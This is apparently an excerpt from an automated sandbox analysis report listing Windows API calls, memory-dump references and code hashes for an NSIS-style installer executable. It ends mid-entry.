                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                      • ShowWindow.USER32(00000000), ref: 00405788
                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                      • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                      • CreatePopupMenu.USER32 ref: 0040581C
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                      • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                      • EmptyClipboard.USER32 ref: 004058B7
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                      • CloseClipboard.USER32 ref: 00405912
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: (7B${
                                                                                      • API String ID: 590372296-525222780
                                                                                      • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                      • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                      • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                      • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                        • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                        • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                        • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                        • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                        • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: (7B$A$Call
                                                                                      • API String ID: 2624150263-413618503
                                                                                      • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                      • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                      • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                      • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                      APIs
                                                                                        • Part of subcall function 6FFB121B: GlobalAlloc.KERNELBASE(00000040,?,6FFB123B,?,6FFB12DF,00000019,6FFB11BE,-000000A0), ref: 6FFB1225
                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FFB1C6B
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6FFB1CB3
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6FFB1CBD
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB1CD0
                                                                                      • GlobalFree.KERNEL32(?), ref: 6FFB1DB2
                                                                                      • GlobalFree.KERNEL32(?), ref: 6FFB1DB7
                                                                                      • GlobalFree.KERNEL32(?), ref: 6FFB1DBC
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB1FA6
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 6FFB2140
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6FFB21B5
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 6FFB21C6
                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 6FFB2220
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 6FFB223A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 245916457-0
                                                                                      • Opcode ID: d39b569b36b1b2881c9bef4702005c0ea5076acc48c054e24ac267f8c1b4de3f
                                                                                      • Instruction ID: a8d9629ea05cececf5abb02c919e98b821625306c56f886759d7eee778bc754e
                                                                                      • Opcode Fuzzy Hash: d39b569b36b1b2881c9bef4702005c0ea5076acc48c054e24ac267f8c1b4de3f
                                                                                      • Instruction Fuzzy Hash: 80228B72D1420ADADB11DFBAC9846EEB7F0FF0A315F10462ED165E7290E7B46A81CB50
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                      • wsprintfW.USER32 ref: 00402E45
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                      • SetDlgItemTextW.USER32(?,?,?), ref: 00402E67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                      • API String ID: 1451636040-1158693248
                                                                                      • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                      • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                      • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                      • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                      • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                      • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                      • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                      • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                      • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                      • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                      • GetSysColor.USER32(?), ref: 004045FE
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                      • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                      • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                      • SetCursor.USER32(00000000), ref: 00404720
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                      • SetCursor.USER32(00000000), ref: 0040473C
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: Call$N
                                                                                      • API String ID: 3103080414-3438112850
                                                                                      • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                      • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                      • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                      • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                      • wsprintfA.USER32 ref: 004060B3
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\v4nrZtP7K2.exe,80000000,00000003), ref: 00405EE2
                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                      • API String ID: 2171350718-461813615
                                                                                      • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                      • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                      • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                      • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                      • GetSysColor.USER32(00000000), ref: 00404421
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                      • GetSysColor.USER32(?), ref: 0040444C
                                                                                      • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                      • DeleteObject.GDI32(?), ref: 00404476
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                      • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                      • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                      • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                      • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2531174081-0
                                                                                      • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                      • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                      • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
